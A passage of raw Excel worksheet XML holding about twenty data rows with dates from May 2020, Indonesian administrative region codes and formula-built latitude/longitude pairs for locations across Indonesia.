      <c r="L2140" t="s">
        <v>2716</v>
      </c>
      <c r="M2140">
        <v>3174020006</v>
      </c>
      <c r="N2140">
        <v>3174020</v>
      </c>
      <c r="O2140">
        <v>3174</v>
      </c>
      <c r="P2140">
        <v>31</v>
      </c>
      <c r="Q2140" t="s">
        <v>427</v>
      </c>
      <c r="R2140" t="s">
        <v>31</v>
      </c>
      <c r="S2140" t="s">
        <v>32</v>
      </c>
      <c r="T2140" t="s">
        <v>33</v>
      </c>
      <c r="U2140" s="5">
        <v>10675759</v>
      </c>
      <c r="V2140" s="5" t="s">
        <v>16352</v>
      </c>
      <c r="W2140" s="5">
        <v>-618678</v>
      </c>
      <c r="X2140" t="s">
        <v>20110</v>
      </c>
      <c r="Y2140" t="str">
        <f t="shared" si="33"/>
        <v>-6.18678,106.75759</v>
      </c>
    </row>
    <row r="2141" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2141">
        <v>191179</v>
      </c>
      <c r="B2141" s="1">
        <v>43970</v>
      </c>
      <c r="C2141" s="2">
        <v>0.63968749999999996</v>
      </c>
      <c r="D2141" t="s">
        <v>22</v>
      </c>
      <c r="E2141" t="s">
        <v>23</v>
      </c>
      <c r="F2141" t="s">
        <v>7148</v>
      </c>
      <c r="H2141" t="s">
        <v>26</v>
      </c>
      <c r="I2141" t="s">
        <v>137</v>
      </c>
      <c r="J2141" t="s">
        <v>2608</v>
      </c>
      <c r="L2141" t="s">
        <v>7149</v>
      </c>
      <c r="M2141">
        <v>3319080002</v>
      </c>
      <c r="N2141">
        <v>3319080</v>
      </c>
      <c r="O2141">
        <v>3319</v>
      </c>
      <c r="P2141">
        <v>33</v>
      </c>
      <c r="Q2141" t="s">
        <v>7150</v>
      </c>
      <c r="R2141" t="s">
        <v>7151</v>
      </c>
      <c r="S2141" t="s">
        <v>7152</v>
      </c>
      <c r="T2141" t="s">
        <v>1134</v>
      </c>
      <c r="U2141" s="5">
        <v>11081504</v>
      </c>
      <c r="V2141" s="5" t="s">
        <v>16353</v>
      </c>
      <c r="W2141" s="5">
        <v>-677544</v>
      </c>
      <c r="X2141" t="s">
        <v>20111</v>
      </c>
      <c r="Y2141" t="str">
        <f t="shared" si="33"/>
        <v>-6.77544,110.81504</v>
      </c>
    </row>
    <row r="2142" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2142">
        <v>191272</v>
      </c>
      <c r="B2142" s="1">
        <v>43971</v>
      </c>
      <c r="C2142" s="2">
        <v>0.82885416666666656</v>
      </c>
      <c r="D2142" t="s">
        <v>22</v>
      </c>
      <c r="E2142" t="s">
        <v>23</v>
      </c>
      <c r="F2142" t="s">
        <v>7153</v>
      </c>
      <c r="G2142" t="s">
        <v>7154</v>
      </c>
      <c r="H2142" t="s">
        <v>26</v>
      </c>
      <c r="I2142" t="s">
        <v>137</v>
      </c>
      <c r="J2142" t="s">
        <v>2627</v>
      </c>
      <c r="L2142" t="s">
        <v>7155</v>
      </c>
      <c r="M2142">
        <v>3276011002</v>
      </c>
      <c r="N2142">
        <v>3276011</v>
      </c>
      <c r="O2142">
        <v>3276</v>
      </c>
      <c r="P2142">
        <v>32</v>
      </c>
      <c r="Q2142" t="s">
        <v>6641</v>
      </c>
      <c r="R2142" t="s">
        <v>6642</v>
      </c>
      <c r="S2142" t="s">
        <v>185</v>
      </c>
      <c r="T2142" t="s">
        <v>42</v>
      </c>
      <c r="U2142" s="5">
        <v>10673823</v>
      </c>
      <c r="V2142" s="5" t="s">
        <v>16354</v>
      </c>
      <c r="W2142" s="5">
        <v>-641939</v>
      </c>
      <c r="X2142" t="s">
        <v>20112</v>
      </c>
      <c r="Y2142" t="str">
        <f t="shared" si="33"/>
        <v>-6.41939,106.73823</v>
      </c>
    </row>
    <row r="2143" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2143">
        <v>191273</v>
      </c>
      <c r="B2143" s="1">
        <v>43971</v>
      </c>
      <c r="C2143" s="2">
        <v>0.83018518518518514</v>
      </c>
      <c r="D2143" t="s">
        <v>22</v>
      </c>
      <c r="E2143" t="s">
        <v>23</v>
      </c>
      <c r="F2143" t="s">
        <v>7156</v>
      </c>
      <c r="G2143" t="s">
        <v>7157</v>
      </c>
      <c r="H2143" t="s">
        <v>26</v>
      </c>
      <c r="I2143" t="s">
        <v>137</v>
      </c>
      <c r="J2143" t="s">
        <v>2627</v>
      </c>
      <c r="L2143" t="s">
        <v>7158</v>
      </c>
      <c r="M2143">
        <v>3276011002</v>
      </c>
      <c r="N2143">
        <v>3276011</v>
      </c>
      <c r="O2143">
        <v>3276</v>
      </c>
      <c r="P2143">
        <v>32</v>
      </c>
      <c r="Q2143" t="s">
        <v>6641</v>
      </c>
      <c r="R2143" t="s">
        <v>6642</v>
      </c>
      <c r="S2143" t="s">
        <v>185</v>
      </c>
      <c r="T2143" t="s">
        <v>42</v>
      </c>
      <c r="U2143" s="5">
        <v>10673694</v>
      </c>
      <c r="V2143" s="5" t="s">
        <v>16355</v>
      </c>
      <c r="W2143" s="5">
        <v>-642096</v>
      </c>
      <c r="X2143" t="s">
        <v>20113</v>
      </c>
      <c r="Y2143" t="str">
        <f t="shared" si="33"/>
        <v>-6.42096,106.73694</v>
      </c>
    </row>
    <row r="2144" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2144">
        <v>191274</v>
      </c>
      <c r="B2144" s="1">
        <v>43971</v>
      </c>
      <c r="C2144" s="2">
        <v>0.83134259259259258</v>
      </c>
      <c r="D2144" t="s">
        <v>22</v>
      </c>
      <c r="E2144" t="s">
        <v>23</v>
      </c>
      <c r="F2144" t="s">
        <v>7159</v>
      </c>
      <c r="G2144" t="s">
        <v>7160</v>
      </c>
      <c r="H2144" t="s">
        <v>26</v>
      </c>
      <c r="I2144" t="s">
        <v>137</v>
      </c>
      <c r="J2144" t="s">
        <v>2627</v>
      </c>
      <c r="L2144" t="s">
        <v>7161</v>
      </c>
      <c r="M2144">
        <v>3276011002</v>
      </c>
      <c r="N2144">
        <v>3276011</v>
      </c>
      <c r="O2144">
        <v>3276</v>
      </c>
      <c r="P2144">
        <v>32</v>
      </c>
      <c r="Q2144" t="s">
        <v>6641</v>
      </c>
      <c r="R2144" t="s">
        <v>6642</v>
      </c>
      <c r="S2144" t="s">
        <v>185</v>
      </c>
      <c r="T2144" t="s">
        <v>42</v>
      </c>
      <c r="U2144" s="5">
        <v>10673819</v>
      </c>
      <c r="V2144" s="5" t="s">
        <v>16356</v>
      </c>
      <c r="W2144" s="5">
        <v>-641949</v>
      </c>
      <c r="X2144" t="s">
        <v>20114</v>
      </c>
      <c r="Y2144" t="str">
        <f t="shared" si="33"/>
        <v>-6.41949,106.73819</v>
      </c>
    </row>
    <row r="2145" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2145">
        <v>191276</v>
      </c>
      <c r="B2145" s="1">
        <v>43972</v>
      </c>
      <c r="C2145" s="2">
        <v>0.2407060185185185</v>
      </c>
      <c r="D2145" t="s">
        <v>22</v>
      </c>
      <c r="E2145" t="s">
        <v>23</v>
      </c>
      <c r="F2145" t="s">
        <v>7162</v>
      </c>
      <c r="H2145" t="s">
        <v>26</v>
      </c>
      <c r="I2145" t="s">
        <v>137</v>
      </c>
      <c r="J2145" t="s">
        <v>2627</v>
      </c>
      <c r="L2145" t="s">
        <v>7163</v>
      </c>
      <c r="M2145">
        <v>3276011002</v>
      </c>
      <c r="N2145">
        <v>3276011</v>
      </c>
      <c r="O2145">
        <v>3276</v>
      </c>
      <c r="P2145">
        <v>32</v>
      </c>
      <c r="Q2145" t="s">
        <v>6641</v>
      </c>
      <c r="R2145" t="s">
        <v>6642</v>
      </c>
      <c r="S2145" t="s">
        <v>185</v>
      </c>
      <c r="T2145" t="s">
        <v>42</v>
      </c>
      <c r="U2145" s="5">
        <v>10673702</v>
      </c>
      <c r="V2145" s="5" t="s">
        <v>16357</v>
      </c>
      <c r="W2145" s="5">
        <v>-642085</v>
      </c>
      <c r="X2145" t="s">
        <v>20115</v>
      </c>
      <c r="Y2145" t="str">
        <f t="shared" si="33"/>
        <v>-6.42085,106.73702</v>
      </c>
    </row>
    <row r="2146" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2146">
        <v>191277</v>
      </c>
      <c r="B2146" s="1">
        <v>43972</v>
      </c>
      <c r="C2146" s="2">
        <v>0.98826388888888894</v>
      </c>
      <c r="D2146" t="s">
        <v>22</v>
      </c>
      <c r="E2146" t="s">
        <v>23</v>
      </c>
      <c r="F2146" t="s">
        <v>7164</v>
      </c>
      <c r="G2146" t="s">
        <v>7165</v>
      </c>
      <c r="H2146" t="s">
        <v>26</v>
      </c>
      <c r="I2146" t="s">
        <v>137</v>
      </c>
      <c r="J2146" t="s">
        <v>6626</v>
      </c>
      <c r="M2146">
        <v>7306040004</v>
      </c>
      <c r="N2146">
        <v>7306040</v>
      </c>
      <c r="O2146">
        <v>7306</v>
      </c>
      <c r="P2146">
        <v>73</v>
      </c>
      <c r="Q2146" t="s">
        <v>7166</v>
      </c>
      <c r="R2146" t="s">
        <v>7167</v>
      </c>
      <c r="S2146" t="s">
        <v>7168</v>
      </c>
      <c r="T2146" t="s">
        <v>6630</v>
      </c>
      <c r="U2146" s="5">
        <v>11946295</v>
      </c>
      <c r="V2146" s="5" t="s">
        <v>16358</v>
      </c>
      <c r="W2146" s="5">
        <v>-520705</v>
      </c>
      <c r="X2146" t="s">
        <v>20116</v>
      </c>
      <c r="Y2146" t="str">
        <f t="shared" si="33"/>
        <v>-5.20705,119.46295</v>
      </c>
    </row>
    <row r="2147" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2147">
        <v>191279</v>
      </c>
      <c r="B2147" s="1">
        <v>43973</v>
      </c>
      <c r="C2147" s="2">
        <v>0.28542824074074075</v>
      </c>
      <c r="D2147" t="s">
        <v>22</v>
      </c>
      <c r="E2147" t="s">
        <v>23</v>
      </c>
      <c r="F2147" t="s">
        <v>7169</v>
      </c>
      <c r="G2147" t="s">
        <v>7170</v>
      </c>
      <c r="H2147" t="s">
        <v>26</v>
      </c>
      <c r="I2147" t="s">
        <v>137</v>
      </c>
      <c r="J2147" t="s">
        <v>7171</v>
      </c>
      <c r="L2147" t="s">
        <v>7172</v>
      </c>
      <c r="M2147">
        <v>6472050008</v>
      </c>
      <c r="N2147">
        <v>6472050</v>
      </c>
      <c r="O2147">
        <v>6472</v>
      </c>
      <c r="P2147">
        <v>64</v>
      </c>
      <c r="Q2147" t="s">
        <v>7173</v>
      </c>
      <c r="R2147" t="s">
        <v>7174</v>
      </c>
      <c r="S2147" t="s">
        <v>7175</v>
      </c>
      <c r="T2147" t="s">
        <v>1308</v>
      </c>
      <c r="U2147" s="5">
        <v>11712293</v>
      </c>
      <c r="V2147" s="5" t="s">
        <v>16359</v>
      </c>
      <c r="W2147" s="5">
        <v>-47392</v>
      </c>
      <c r="X2147" t="s">
        <v>14432</v>
      </c>
      <c r="Y2147" t="str">
        <f t="shared" si="33"/>
        <v xml:space="preserve"> -0.47392,117.12293</v>
      </c>
    </row>
    <row r="2148" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2148">
        <v>191283</v>
      </c>
      <c r="B2148" s="1">
        <v>43973</v>
      </c>
      <c r="C2148" s="2">
        <v>0.47135416666666669</v>
      </c>
      <c r="D2148" t="s">
        <v>22</v>
      </c>
      <c r="E2148" t="s">
        <v>23</v>
      </c>
      <c r="F2148" t="s">
        <v>7176</v>
      </c>
      <c r="G2148" t="s">
        <v>7177</v>
      </c>
      <c r="H2148" t="s">
        <v>26</v>
      </c>
      <c r="I2148" t="s">
        <v>137</v>
      </c>
      <c r="J2148" t="s">
        <v>7178</v>
      </c>
      <c r="L2148" t="s">
        <v>7179</v>
      </c>
      <c r="M2148">
        <v>1871081006</v>
      </c>
      <c r="N2148">
        <v>1871081</v>
      </c>
      <c r="O2148">
        <v>1871</v>
      </c>
      <c r="P2148">
        <v>18</v>
      </c>
      <c r="Q2148" t="s">
        <v>7180</v>
      </c>
      <c r="R2148" t="s">
        <v>7180</v>
      </c>
      <c r="S2148" t="s">
        <v>7181</v>
      </c>
      <c r="T2148" t="s">
        <v>2082</v>
      </c>
      <c r="U2148" s="5">
        <v>10521967</v>
      </c>
      <c r="V2148" s="5" t="s">
        <v>16360</v>
      </c>
      <c r="W2148" s="5">
        <v>-537399</v>
      </c>
      <c r="X2148" t="s">
        <v>20117</v>
      </c>
      <c r="Y2148" t="str">
        <f t="shared" si="33"/>
        <v>-5.37399,105.21967</v>
      </c>
    </row>
    <row r="2149" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2149">
        <v>191284</v>
      </c>
      <c r="B2149" s="1">
        <v>43973</v>
      </c>
      <c r="C2149" s="2">
        <v>0.98337962962962966</v>
      </c>
      <c r="D2149" t="s">
        <v>22</v>
      </c>
      <c r="E2149" t="s">
        <v>23</v>
      </c>
      <c r="F2149" t="s">
        <v>7182</v>
      </c>
      <c r="G2149" t="s">
        <v>7183</v>
      </c>
      <c r="H2149" t="s">
        <v>26</v>
      </c>
      <c r="I2149" t="s">
        <v>137</v>
      </c>
      <c r="J2149" t="s">
        <v>7171</v>
      </c>
      <c r="M2149">
        <v>6472061005</v>
      </c>
      <c r="N2149">
        <v>6472061</v>
      </c>
      <c r="O2149">
        <v>6472</v>
      </c>
      <c r="P2149">
        <v>64</v>
      </c>
      <c r="Q2149" t="s">
        <v>7184</v>
      </c>
      <c r="R2149" t="s">
        <v>7185</v>
      </c>
      <c r="S2149" t="s">
        <v>7175</v>
      </c>
      <c r="T2149" t="s">
        <v>1308</v>
      </c>
      <c r="U2149" s="5">
        <v>11717245</v>
      </c>
      <c r="V2149" s="5" t="s">
        <v>16361</v>
      </c>
      <c r="W2149" s="5">
        <v>-45033</v>
      </c>
      <c r="X2149" t="s">
        <v>14433</v>
      </c>
      <c r="Y2149" t="str">
        <f t="shared" si="33"/>
        <v xml:space="preserve"> -0.45033,117.17245</v>
      </c>
    </row>
    <row r="2150" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2150">
        <v>191285</v>
      </c>
      <c r="B2150" s="1">
        <v>43974</v>
      </c>
      <c r="C2150" s="2">
        <v>0.95489583333333339</v>
      </c>
      <c r="D2150" t="s">
        <v>22</v>
      </c>
      <c r="E2150" t="s">
        <v>23</v>
      </c>
      <c r="F2150" t="s">
        <v>7186</v>
      </c>
      <c r="G2150" t="s">
        <v>7187</v>
      </c>
      <c r="H2150" t="s">
        <v>26</v>
      </c>
      <c r="I2150" t="s">
        <v>137</v>
      </c>
      <c r="J2150" t="s">
        <v>7171</v>
      </c>
      <c r="L2150" t="s">
        <v>7188</v>
      </c>
      <c r="M2150">
        <v>6472061001</v>
      </c>
      <c r="N2150">
        <v>6472061</v>
      </c>
      <c r="O2150">
        <v>6472</v>
      </c>
      <c r="P2150">
        <v>64</v>
      </c>
      <c r="Q2150" t="s">
        <v>7189</v>
      </c>
      <c r="R2150" t="s">
        <v>7185</v>
      </c>
      <c r="S2150" t="s">
        <v>7175</v>
      </c>
      <c r="T2150" t="s">
        <v>1308</v>
      </c>
      <c r="U2150" s="5">
        <v>11716787</v>
      </c>
      <c r="V2150" s="5" t="s">
        <v>16362</v>
      </c>
      <c r="W2150" s="5">
        <v>-46971</v>
      </c>
      <c r="X2150" t="s">
        <v>14434</v>
      </c>
      <c r="Y2150" t="str">
        <f t="shared" si="33"/>
        <v xml:space="preserve"> -0.46971,117.16787</v>
      </c>
    </row>
    <row r="2151" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2151">
        <v>191286</v>
      </c>
      <c r="B2151" s="1">
        <v>43975</v>
      </c>
      <c r="C2151" s="2">
        <v>0.16256944444444446</v>
      </c>
      <c r="D2151" t="s">
        <v>22</v>
      </c>
      <c r="E2151" t="s">
        <v>23</v>
      </c>
      <c r="F2151" t="s">
        <v>7190</v>
      </c>
      <c r="H2151" t="s">
        <v>26</v>
      </c>
      <c r="I2151" t="s">
        <v>137</v>
      </c>
      <c r="J2151" t="s">
        <v>7171</v>
      </c>
      <c r="L2151" t="s">
        <v>7191</v>
      </c>
      <c r="M2151">
        <v>6472061001</v>
      </c>
      <c r="N2151">
        <v>6472061</v>
      </c>
      <c r="O2151">
        <v>6472</v>
      </c>
      <c r="P2151">
        <v>64</v>
      </c>
      <c r="Q2151" t="s">
        <v>7189</v>
      </c>
      <c r="R2151" t="s">
        <v>7185</v>
      </c>
      <c r="S2151" t="s">
        <v>7175</v>
      </c>
      <c r="T2151" t="s">
        <v>1308</v>
      </c>
      <c r="U2151" s="5">
        <v>11715294</v>
      </c>
      <c r="V2151" s="5" t="s">
        <v>16363</v>
      </c>
      <c r="W2151" s="5">
        <v>-48026</v>
      </c>
      <c r="X2151" t="s">
        <v>14435</v>
      </c>
      <c r="Y2151" t="str">
        <f t="shared" si="33"/>
        <v xml:space="preserve"> -0.48026,117.15294</v>
      </c>
    </row>
    <row r="2152" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2152">
        <v>191287</v>
      </c>
      <c r="B2152" s="1">
        <v>43976</v>
      </c>
      <c r="C2152" s="2">
        <v>0.40208333333333335</v>
      </c>
      <c r="D2152" t="s">
        <v>22</v>
      </c>
      <c r="E2152" t="s">
        <v>23</v>
      </c>
      <c r="F2152" t="s">
        <v>7192</v>
      </c>
      <c r="G2152" t="s">
        <v>7193</v>
      </c>
      <c r="H2152" t="s">
        <v>26</v>
      </c>
      <c r="I2152" t="s">
        <v>137</v>
      </c>
      <c r="J2152" t="s">
        <v>7171</v>
      </c>
      <c r="L2152" t="s">
        <v>7194</v>
      </c>
      <c r="M2152">
        <v>6472061001</v>
      </c>
      <c r="N2152">
        <v>6472061</v>
      </c>
      <c r="O2152">
        <v>6472</v>
      </c>
      <c r="P2152">
        <v>64</v>
      </c>
      <c r="Q2152" t="s">
        <v>7189</v>
      </c>
      <c r="R2152" t="s">
        <v>7185</v>
      </c>
      <c r="S2152" t="s">
        <v>7175</v>
      </c>
      <c r="T2152" t="s">
        <v>1308</v>
      </c>
      <c r="U2152" s="5">
        <v>11716389</v>
      </c>
      <c r="V2152" s="5" t="s">
        <v>16364</v>
      </c>
      <c r="W2152" s="5">
        <v>-47385</v>
      </c>
      <c r="X2152" t="s">
        <v>14436</v>
      </c>
      <c r="Y2152" t="str">
        <f t="shared" si="33"/>
        <v xml:space="preserve"> -0.47385,117.16389</v>
      </c>
    </row>
    <row r="2153" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2153">
        <v>191288</v>
      </c>
      <c r="B2153" s="1">
        <v>43976</v>
      </c>
      <c r="C2153" s="2">
        <v>0.48434027777777783</v>
      </c>
      <c r="D2153" t="s">
        <v>22</v>
      </c>
      <c r="E2153" t="s">
        <v>23</v>
      </c>
      <c r="F2153" t="s">
        <v>7195</v>
      </c>
      <c r="G2153" t="s">
        <v>7196</v>
      </c>
      <c r="H2153" t="s">
        <v>26</v>
      </c>
      <c r="I2153" t="s">
        <v>137</v>
      </c>
      <c r="J2153" t="s">
        <v>7171</v>
      </c>
      <c r="L2153" t="s">
        <v>7197</v>
      </c>
      <c r="M2153">
        <v>6472050006</v>
      </c>
      <c r="N2153">
        <v>6472050</v>
      </c>
      <c r="O2153">
        <v>6472</v>
      </c>
      <c r="P2153">
        <v>64</v>
      </c>
      <c r="Q2153" t="s">
        <v>7198</v>
      </c>
      <c r="R2153" t="s">
        <v>7174</v>
      </c>
      <c r="S2153" t="s">
        <v>7175</v>
      </c>
      <c r="T2153" t="s">
        <v>1308</v>
      </c>
      <c r="U2153" s="5">
        <v>11714630</v>
      </c>
      <c r="V2153" s="5" t="s">
        <v>16365</v>
      </c>
      <c r="W2153" s="5">
        <v>-47543</v>
      </c>
      <c r="X2153" t="s">
        <v>14437</v>
      </c>
      <c r="Y2153" t="str">
        <f t="shared" si="33"/>
        <v xml:space="preserve"> -0.47543,117.14630</v>
      </c>
    </row>
    <row r="2154" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2154">
        <v>191320</v>
      </c>
      <c r="B2154" s="1">
        <v>43977</v>
      </c>
      <c r="C2154" s="2">
        <v>0.87486111111111109</v>
      </c>
      <c r="D2154" t="s">
        <v>22</v>
      </c>
      <c r="E2154" t="s">
        <v>23</v>
      </c>
      <c r="F2154" t="s">
        <v>7199</v>
      </c>
      <c r="G2154" t="s">
        <v>7200</v>
      </c>
      <c r="H2154" t="s">
        <v>26</v>
      </c>
      <c r="I2154" t="s">
        <v>137</v>
      </c>
      <c r="J2154" t="s">
        <v>7171</v>
      </c>
      <c r="L2154" t="s">
        <v>7201</v>
      </c>
      <c r="M2154">
        <v>6472060011</v>
      </c>
      <c r="N2154">
        <v>6472060</v>
      </c>
      <c r="O2154">
        <v>6472</v>
      </c>
      <c r="P2154">
        <v>64</v>
      </c>
      <c r="Q2154" t="s">
        <v>7202</v>
      </c>
      <c r="R2154" t="s">
        <v>7203</v>
      </c>
      <c r="S2154" t="s">
        <v>7175</v>
      </c>
      <c r="T2154" t="s">
        <v>1308</v>
      </c>
      <c r="U2154" s="5">
        <v>11716243</v>
      </c>
      <c r="V2154" s="5" t="s">
        <v>16366</v>
      </c>
      <c r="W2154" s="5">
        <v>-42751</v>
      </c>
      <c r="X2154" t="s">
        <v>14438</v>
      </c>
      <c r="Y2154" t="str">
        <f t="shared" si="33"/>
        <v xml:space="preserve"> -0.42751,117.16243</v>
      </c>
    </row>
    <row r="2155" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2155">
        <v>191321</v>
      </c>
      <c r="B2155" s="1">
        <v>43978</v>
      </c>
      <c r="C2155" s="2">
        <v>0.13099537037037037</v>
      </c>
      <c r="D2155" t="s">
        <v>22</v>
      </c>
      <c r="E2155" t="s">
        <v>23</v>
      </c>
      <c r="F2155" t="s">
        <v>7204</v>
      </c>
      <c r="H2155" t="s">
        <v>26</v>
      </c>
      <c r="I2155" t="s">
        <v>137</v>
      </c>
      <c r="J2155" t="s">
        <v>7171</v>
      </c>
      <c r="L2155" t="s">
        <v>7205</v>
      </c>
      <c r="M2155">
        <v>6472061001</v>
      </c>
      <c r="N2155">
        <v>6472061</v>
      </c>
      <c r="O2155">
        <v>6472</v>
      </c>
      <c r="P2155">
        <v>64</v>
      </c>
      <c r="Q2155" t="s">
        <v>7189</v>
      </c>
      <c r="R2155" t="s">
        <v>7185</v>
      </c>
      <c r="S2155" t="s">
        <v>7175</v>
      </c>
      <c r="T2155" t="s">
        <v>1308</v>
      </c>
      <c r="U2155" s="5">
        <v>11716635</v>
      </c>
      <c r="V2155" s="5" t="s">
        <v>16367</v>
      </c>
      <c r="W2155" s="5">
        <v>-47246</v>
      </c>
      <c r="X2155" t="s">
        <v>14439</v>
      </c>
      <c r="Y2155" t="str">
        <f t="shared" si="33"/>
        <v xml:space="preserve"> -0.47246,117.16635</v>
      </c>
    </row>
    <row r="2156" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2156">
        <v>191322</v>
      </c>
      <c r="B2156" s="1">
        <v>43978</v>
      </c>
      <c r="C2156" s="2">
        <v>0.89148148148148154</v>
      </c>
      <c r="D2156" t="s">
        <v>22</v>
      </c>
      <c r="E2156" t="s">
        <v>23</v>
      </c>
      <c r="F2156" t="s">
        <v>7206</v>
      </c>
      <c r="G2156" t="s">
        <v>7207</v>
      </c>
      <c r="H2156" t="s">
        <v>26</v>
      </c>
      <c r="I2156" t="s">
        <v>137</v>
      </c>
      <c r="J2156" t="s">
        <v>7171</v>
      </c>
      <c r="L2156" t="s">
        <v>7208</v>
      </c>
      <c r="M2156">
        <v>6472061001</v>
      </c>
      <c r="N2156">
        <v>6472061</v>
      </c>
      <c r="O2156">
        <v>6472</v>
      </c>
      <c r="P2156">
        <v>64</v>
      </c>
      <c r="Q2156" t="s">
        <v>7189</v>
      </c>
      <c r="R2156" t="s">
        <v>7185</v>
      </c>
      <c r="S2156" t="s">
        <v>7175</v>
      </c>
      <c r="T2156" t="s">
        <v>1308</v>
      </c>
      <c r="U2156" s="5">
        <v>11716748</v>
      </c>
      <c r="V2156" s="5" t="s">
        <v>16368</v>
      </c>
      <c r="W2156" s="5">
        <v>-46958</v>
      </c>
      <c r="X2156" t="s">
        <v>14440</v>
      </c>
      <c r="Y2156" t="str">
        <f t="shared" si="33"/>
        <v xml:space="preserve"> -0.46958,117.16748</v>
      </c>
    </row>
    <row r="2157" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2157">
        <v>191328</v>
      </c>
      <c r="B2157" s="1">
        <v>43979</v>
      </c>
      <c r="C2157" s="2">
        <v>0.40077546296296296</v>
      </c>
      <c r="D2157" t="s">
        <v>22</v>
      </c>
      <c r="E2157" t="s">
        <v>23</v>
      </c>
      <c r="F2157" t="s">
        <v>7209</v>
      </c>
      <c r="G2157" t="s">
        <v>7210</v>
      </c>
      <c r="H2157" t="s">
        <v>26</v>
      </c>
      <c r="I2157" t="s">
        <v>137</v>
      </c>
      <c r="J2157" t="s">
        <v>2622</v>
      </c>
      <c r="L2157" t="s">
        <v>7211</v>
      </c>
      <c r="M2157">
        <v>3578070002</v>
      </c>
      <c r="N2157">
        <v>3578070</v>
      </c>
      <c r="O2157">
        <v>3578</v>
      </c>
      <c r="P2157">
        <v>35</v>
      </c>
      <c r="Q2157" t="s">
        <v>7212</v>
      </c>
      <c r="R2157" t="s">
        <v>7213</v>
      </c>
      <c r="S2157" t="s">
        <v>1346</v>
      </c>
      <c r="T2157" t="s">
        <v>1221</v>
      </c>
      <c r="U2157" s="5">
        <v>11279830</v>
      </c>
      <c r="V2157" s="5" t="s">
        <v>16369</v>
      </c>
      <c r="W2157" s="5">
        <v>-732365</v>
      </c>
      <c r="X2157" t="s">
        <v>20118</v>
      </c>
      <c r="Y2157" t="str">
        <f t="shared" si="33"/>
        <v>-7.32365,112.79830</v>
      </c>
    </row>
    <row r="2158" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2158">
        <v>191329</v>
      </c>
      <c r="B2158" s="1">
        <v>43979</v>
      </c>
      <c r="C2158" s="2">
        <v>0.39936342592592594</v>
      </c>
      <c r="D2158" t="s">
        <v>22</v>
      </c>
      <c r="E2158" t="s">
        <v>23</v>
      </c>
      <c r="F2158" t="s">
        <v>7214</v>
      </c>
      <c r="G2158" t="s">
        <v>7215</v>
      </c>
      <c r="H2158" t="s">
        <v>26</v>
      </c>
      <c r="I2158" t="s">
        <v>1538</v>
      </c>
      <c r="J2158" t="s">
        <v>2622</v>
      </c>
      <c r="L2158" t="s">
        <v>7216</v>
      </c>
      <c r="M2158">
        <v>3578060004</v>
      </c>
      <c r="N2158">
        <v>3578060</v>
      </c>
      <c r="O2158">
        <v>3578</v>
      </c>
      <c r="P2158">
        <v>35</v>
      </c>
      <c r="Q2158" t="s">
        <v>7217</v>
      </c>
      <c r="R2158" t="s">
        <v>2631</v>
      </c>
      <c r="S2158" t="s">
        <v>1346</v>
      </c>
      <c r="T2158" t="s">
        <v>1221</v>
      </c>
      <c r="U2158" s="5">
        <v>11280242</v>
      </c>
      <c r="V2158" s="5" t="s">
        <v>16370</v>
      </c>
      <c r="W2158" s="5">
        <v>-733722</v>
      </c>
      <c r="X2158" t="s">
        <v>20119</v>
      </c>
      <c r="Y2158" t="str">
        <f t="shared" si="33"/>
        <v>-7.33722,112.80242</v>
      </c>
    </row>
    <row r="2159" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2159">
        <v>191330</v>
      </c>
      <c r="B2159" s="1">
        <v>43979</v>
      </c>
      <c r="C2159" s="2">
        <v>0.41075231481481483</v>
      </c>
      <c r="D2159" t="s">
        <v>22</v>
      </c>
      <c r="E2159" t="s">
        <v>23</v>
      </c>
      <c r="F2159" t="s">
        <v>7218</v>
      </c>
      <c r="G2159" t="s">
        <v>7219</v>
      </c>
      <c r="H2159" t="s">
        <v>26</v>
      </c>
      <c r="I2159" t="s">
        <v>137</v>
      </c>
      <c r="J2159" t="s">
        <v>2622</v>
      </c>
      <c r="L2159" t="s">
        <v>7220</v>
      </c>
      <c r="M2159">
        <v>3578070003</v>
      </c>
      <c r="N2159">
        <v>3578070</v>
      </c>
      <c r="O2159">
        <v>3578</v>
      </c>
      <c r="P2159">
        <v>35</v>
      </c>
      <c r="Q2159" t="s">
        <v>7221</v>
      </c>
      <c r="R2159" t="s">
        <v>7213</v>
      </c>
      <c r="S2159" t="s">
        <v>1346</v>
      </c>
      <c r="T2159" t="s">
        <v>1221</v>
      </c>
      <c r="U2159" s="5">
        <v>11279578</v>
      </c>
      <c r="V2159" s="5" t="s">
        <v>16371</v>
      </c>
      <c r="W2159" s="5">
        <v>-731110</v>
      </c>
      <c r="X2159" t="s">
        <v>20120</v>
      </c>
      <c r="Y2159" t="str">
        <f t="shared" si="33"/>
        <v>-7.31110,112.79578</v>
      </c>
    </row>
    <row r="2160" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2160">
        <v>191331</v>
      </c>
      <c r="B2160" s="1">
        <v>43979</v>
      </c>
      <c r="C2160" s="2">
        <v>0.41626157407407405</v>
      </c>
      <c r="D2160" t="s">
        <v>22</v>
      </c>
      <c r="E2160" t="s">
        <v>23</v>
      </c>
      <c r="F2160" t="s">
        <v>7222</v>
      </c>
      <c r="H2160" t="s">
        <v>26</v>
      </c>
      <c r="I2160" t="s">
        <v>137</v>
      </c>
      <c r="J2160" t="s">
        <v>2622</v>
      </c>
      <c r="L2160" t="s">
        <v>7223</v>
      </c>
      <c r="M2160">
        <v>3578070006</v>
      </c>
      <c r="N2160">
        <v>3578070</v>
      </c>
      <c r="O2160">
        <v>3578</v>
      </c>
      <c r="P2160">
        <v>35</v>
      </c>
      <c r="Q2160" t="s">
        <v>7224</v>
      </c>
      <c r="R2160" t="s">
        <v>7213</v>
      </c>
